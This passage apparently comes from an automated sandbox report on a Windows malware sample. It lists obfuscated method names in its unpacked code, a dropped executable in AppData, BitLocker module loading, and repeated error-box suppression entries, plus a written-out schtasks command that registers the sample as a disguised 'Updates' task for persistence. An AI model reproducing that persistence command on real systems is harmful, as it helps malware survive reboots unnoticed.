                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, ALe4H1aZrGP7WZgId3.csHigh entropy of concatenated method names: 'dAac9HFTDg', 'JXrc1MnFFT', 'rkVcvVmXTx', 'GTCc2kF7wW', 'AntcOudjc6', 'JQIcfS3AQw', 'Bgrc5omRXh', 'H1ycwkEMqL', 'qw1cPOR4Gl', 'Mv1c7ix2bh'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, ah53opGUxTfCHXjgD8.csHigh entropy of concatenated method names: 'NuydesgTHH', 'hpOd4BmPXM', 'OP1dleVxfx', 'hK2d86pw9n', 'aqqdcB343u', 'vo2dyDjIWI', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, to3XjkU4G0PFJ9T0Kr.csHigh entropy of concatenated method names: 'SMykBk8dth', 'pCqkGByyNm', 'JwAXZcsjRF', 'X7rX3uofVm', 'uMJkqTaRTm', 'ROQkELKVwD', 'HalkxBVOLR', 'lFtkK4BlWd', 'ao4kV5Yo6W', 'q0nkiEfP9q'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, CN5yYHyRFbwxLmQByk.csHigh entropy of concatenated method names: 'eoAgns4WsC', 'oewgrIdyn9', 'FThg0CQurM', 'tt0ge7rQb6', 'Cdxg4A92dg', 'NSngltJugh', 'cqmg8SThhh', 'arDgycGxxP', 'UTggAcMUNr', 'g2jgDcJfwf'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, xQPiMs0Su5EiSHtEVc.csHigh entropy of concatenated method names: 'Dispose', 'CwA3aOX9aO', 'kkWI15meV3', 'OuYWgVV7FW', 'AKm3GFmnwp', 'Vo23z8VPZD', 'ProcessDialogKey', 'NItIZLe4H1', 'arGI3P7WZg', 'cd3IIZh53o'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, FZAVh29FgqEruZXF2d.csHigh entropy of concatenated method names: 'I2llnKLLOD', 'qrcl022U06', 'zFil4GIPKQ', 'rH2l8rtolS', 'TF5lyEyVnp', 'BwF4MgLqgB', 'mmv4UtQav6', 'xTw4jaltOx', 'MeY4BngpOi', 'EZP4aby8S2'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, VZ6G5a33HLJq5VC6DiA.csHigh entropy of concatenated method names: 'ivMdGGxVgR', 'S8pdze52nK', 'tJ2LZhrfkN', 'vGXL36Csca', 'QjALIKsyJs', 'bA0LgWCOIo', 'UPOLTwiidv', 'nYuLnv6Owy', 'hVhLrhtaZ2', 'Kt9L0v7WXW'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, LZKDRPI5m93416evaE.csHigh entropy of concatenated method names: 'T4oYNrwkJ', 'NIZt6Xs1a', 'k1iFGsvfS', 'SgPSGelPd', 'FXIhhdpZ6', 'LQG64GFtU', 'DF7ricaPu4pE9LJJjs', 'g6e4FWCbSEnwyrYgAt', 'i7kXiOGeH', 'JrXdJ6HiN'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, StXgmoxJK0VbLhPolI.csHigh entropy of concatenated method names: 'PjkmpTPNWc', 'WPOmhHfjmC', 'jINm9aaNLV', 'J2fm1Z9dNC', 'G8tm2kx90h', 'JiOmOF4CEp', 'ce1m5WjHvO', 'PplmwrMq3P', 'D9Nm7QvJOp', 'BYsmqZZ9og'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, jReNHLjXOSwAOX9aOt.csHigh entropy of concatenated method names: 'AChcR2nSji', 'xa4ckfAS7Y', 'iGRcc5rewK', 'j3qcLG9HUM', 'EKEcuvN0MS', 'I8qcsnf9LB', 'Dispose', 'N8XXrsbjKp', 'sNYX0vn4Ru', 'Y1AXeA4cPA'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, v28Va1zOGSaDoSRTxf.csHigh entropy of concatenated method names: 'FG9dFa0y9R', 'xGEdpPtRES', 'QiYdhQvcD5', 'Im0d9DeQTX', 'xkTd1hEha5', 'yGRd2NGPaR', 'XHydOdHUjY', 'HrKdsfft78', 'LxKdoOPPib', 'xTgdWybeqc'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, zDbEFX5MNIQlmgofDa.csHigh entropy of concatenated method names: 'VJD8rgLbCE', 'Anr8eocsSE', 'Cc28lx16QL', 'jrblG1urGk', 'LSvlze9XTo', 'ABK8Zi2pFR', 'Qia83BX9EZ', 'a7G8Ikr8Bh', 'xaB8gLBiZG', 'HNT8Tt4vGA'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, A0hF9CTSjuKdGsFWh7.csHigh entropy of concatenated method names: 'QHp38O0t4S', 'egk3yX2NaX', 'HQL3DCk3tc', 'PVB3QO5J5F', 'LoL3RIw6ZA', 'Sh23CFgqEr', 'tai0JrrS3hy1ypYyiK', 'H8XS5NFrqFUSIG8IyC', 'DLL33MpYNY', 'M9R3geTFe6'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, ykwq833Z6B34s0VEfhO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SChdqw9LmL', 'YtodEci6Vc', 'whBdx4EvCw', 'aYpdKE7Iak', 'SxOdVaVCrI', 'J9KdiWTVoc', 'VCZdJbWmSo'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, X7jrSvhQLCk3tcEVBO.csHigh entropy of concatenated method names: 'Lqbet3XrpT', 'yepeFRTUMv', 'vvgepHf6w4', 'spYeh5uQUR', 'bkYeRBBNfJ', 'mFbeCmfPEs', 'eIxekiHMYK', 'E0GeXiTul5', 'i6JecjWPiE', 'B0bednuIjv'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, uSEF6mPAc9wdH36276.csHigh entropy of concatenated method names: 'BFk8o7eh1k', 'vjg8WmN7Tp', 'c6P8Y9kVMv', 'iKo8tJTluc', 'NwP8NWNrID', 'Af98FjeEJj', 'NWk8SRZXy1', 'rML8p5tw03', 'oym8hAmrY1', 'fEJ8639kWA'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, KJ5FuO6XoQatL5oLIw.csHigh entropy of concatenated method names: 'xTi4NhFv4Z', 'hiZ4SMGQ7r', 'QsGevD00J1', 'nUUe2Ph6TR', 'ojDeOsIMnY', 'gGmefpFBsc', 'XU3e518Mcp', 'LSiewmIYWF', 'OucePwld3h', 'dc5e7fiR7a'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, ihJ4FBKXUtjaE3ggN7.csHigh entropy of concatenated method names: 'B9xR7ZXdOv', 'TtXREu5toR', 'bCNRK2B8hT', 'FXqRVvK8AG', 'Te8R1xAI8V', 'oEyRvnLxJC', 'afWR2uoyXv', 'CZEROdSHhD', 'OkDRfERTHp', 'XpKR5SokOX'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, pAofq3JBjTtJlGsXSM.csHigh entropy of concatenated method names: 'esukDZONPH', 'X77kQcwBHY', 'ToString', 'RHfkrrNPHl', 'Cdak0YfWQR', 'Bx4ke3CBDb', 'dyAk4oUEs8', 'GkgklViage', 'nIVk8JnjiD', 'OYZky5J6oa'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, U1KWHpiL3OAw2XEwe2.csHigh entropy of concatenated method names: 'ToString', 'uyECqB6txv', 'r5nC1AWgZK', 'WteCvY9Opv', 'pg3C2PxUeI', 'IOyCOE20Kr', 'i6MCfnLiVw', 'jjcC5BsRRa', 'cm7Cw83Orp', 'kHaCPbwxPX'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, DO0t4SpngkX2NaXBd4.csHigh entropy of concatenated method names: 'GHJ0KRk8XU', 'rYq0VxYhdQ', 'dWp0ijNjTd', 'a8r0J6iNHT', 'hlO0MfHkiI', 'xFE0UOifdT', 'Yyf0je3bnu', 'cc40BjiMhN', 'CtT0ambyAn', 'mjh0G598i1'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, ALe4H1aZrGP7WZgId3.csHigh entropy of concatenated method names: 'dAac9HFTDg', 'JXrc1MnFFT', 'rkVcvVmXTx', 'GTCc2kF7wW', 'AntcOudjc6', 'JQIcfS3AQw', 'Bgrc5omRXh', 'H1ycwkEMqL', 'qw1cPOR4Gl', 'Mv1c7ix2bh'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, ah53opGUxTfCHXjgD8.csHigh entropy of concatenated method names: 'NuydesgTHH', 'hpOd4BmPXM', 'OP1dleVxfx', 'hK2d86pw9n', 'aqqdcB343u', 'vo2dyDjIWI', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, to3XjkU4G0PFJ9T0Kr.csHigh entropy of concatenated method names: 'SMykBk8dth', 'pCqkGByyNm', 'JwAXZcsjRF', 'X7rX3uofVm', 'uMJkqTaRTm', 'ROQkELKVwD', 'HalkxBVOLR', 'lFtkK4BlWd', 'ao4kV5Yo6W', 'q0nkiEfP9q'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, CN5yYHyRFbwxLmQByk.csHigh entropy of concatenated method names: 'eoAgns4WsC', 'oewgrIdyn9', 'FThg0CQurM', 'tt0ge7rQb6', 'Cdxg4A92dg', 'NSngltJugh', 'cqmg8SThhh', 'arDgycGxxP', 'UTggAcMUNr', 'g2jgDcJfwf'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, xQPiMs0Su5EiSHtEVc.csHigh entropy of concatenated method names: 'Dispose', 'CwA3aOX9aO', 'kkWI15meV3', 'OuYWgVV7FW', 'AKm3GFmnwp', 'Vo23z8VPZD', 'ProcessDialogKey', 'NItIZLe4H1', 'arGI3P7WZg', 'cd3IIZh53o'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, FZAVh29FgqEruZXF2d.csHigh entropy of concatenated method names: 'I2llnKLLOD', 'qrcl022U06', 'zFil4GIPKQ', 'rH2l8rtolS', 'TF5lyEyVnp', 'BwF4MgLqgB', 'mmv4UtQav6', 'xTw4jaltOx', 'MeY4BngpOi', 'EZP4aby8S2'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, VZ6G5a33HLJq5VC6DiA.csHigh entropy of concatenated method names: 'ivMdGGxVgR', 'S8pdze52nK', 'tJ2LZhrfkN', 'vGXL36Csca', 'QjALIKsyJs', 'bA0LgWCOIo', 'UPOLTwiidv', 'nYuLnv6Owy', 'hVhLrhtaZ2', 'Kt9L0v7WXW'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, LZKDRPI5m93416evaE.csHigh entropy of concatenated method names: 'T4oYNrwkJ', 'NIZt6Xs1a', 'k1iFGsvfS', 'SgPSGelPd', 'FXIhhdpZ6', 'LQG64GFtU', 'DF7ricaPu4pE9LJJjs', 'g6e4FWCbSEnwyrYgAt', 'i7kXiOGeH', 'JrXdJ6HiN'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, StXgmoxJK0VbLhPolI.csHigh entropy of concatenated method names: 'PjkmpTPNWc', 'WPOmhHfjmC', 'jINm9aaNLV', 'J2fm1Z9dNC', 'G8tm2kx90h', 'JiOmOF4CEp', 'ce1m5WjHvO', 'PplmwrMq3P', 'D9Nm7QvJOp', 'BYsmqZZ9og'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, jReNHLjXOSwAOX9aOt.csHigh entropy of concatenated method names: 'AChcR2nSji', 'xa4ckfAS7Y', 'iGRcc5rewK', 'j3qcLG9HUM', 'EKEcuvN0MS', 'I8qcsnf9LB', 'Dispose', 'N8XXrsbjKp', 'sNYX0vn4Ru', 'Y1AXeA4cPA'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, v28Va1zOGSaDoSRTxf.csHigh entropy of concatenated method names: 'FG9dFa0y9R', 'xGEdpPtRES', 'QiYdhQvcD5', 'Im0d9DeQTX', 'xkTd1hEha5', 'yGRd2NGPaR', 'XHydOdHUjY', 'HrKdsfft78', 'LxKdoOPPib', 'xTgdWybeqc'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, zDbEFX5MNIQlmgofDa.csHigh entropy of concatenated method names: 'VJD8rgLbCE', 'Anr8eocsSE', 'Cc28lx16QL', 'jrblG1urGk', 'LSvlze9XTo', 'ABK8Zi2pFR', 'Qia83BX9EZ', 'a7G8Ikr8Bh', 'xaB8gLBiZG', 'HNT8Tt4vGA'
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, A0hF9CTSjuKdGsFWh7.csHigh entropy of concatenated method names: 'QHp38O0t4S', 'egk3yX2NaX', 'HQL3DCk3tc', 'PVB3QO5J5F', 'LoL3RIw6ZA', 'Sh23CFgqEr', 'tai0JrrS3hy1ypYyiK', 'H8XS5NFrqFUSIG8IyC', 'DLL33MpYNY', 'M9R3geTFe6'
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeFile created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
